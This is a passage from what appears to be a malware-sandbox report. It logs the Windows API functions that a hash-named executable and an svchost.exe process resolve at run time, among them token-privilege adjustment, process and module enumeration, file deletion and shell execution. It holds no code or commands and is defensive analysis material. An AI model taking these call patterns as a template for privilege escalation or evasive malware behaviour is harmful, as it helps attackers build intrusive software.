\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPath (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter DeleteFile (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter DeleteFileW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValue (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivilegesW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformationW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessIdW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter OpenProcessW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter EnumProcesses (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter EnumProcessesW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter FormatMessage (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter FormatMessageW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter EnumProcessModulesW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetModuleInformation (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetModuleInformationW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseName (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseNameW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameEx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CopyFile (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CopyFileW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter ShellExecuteEx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter AddRefActCtx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter ReleaseActCtx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter GetCurrentActCtx (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00005776)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ShellExecuteEx (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 